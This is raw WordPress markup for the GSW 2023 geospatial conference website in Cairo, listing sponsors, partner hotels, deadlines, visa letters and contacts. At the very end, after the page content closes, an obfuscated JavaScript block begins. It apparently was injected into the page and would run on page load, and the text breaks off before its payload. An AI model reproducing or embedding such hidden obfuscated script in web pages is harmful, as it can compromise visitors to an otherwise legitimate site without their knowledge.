src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 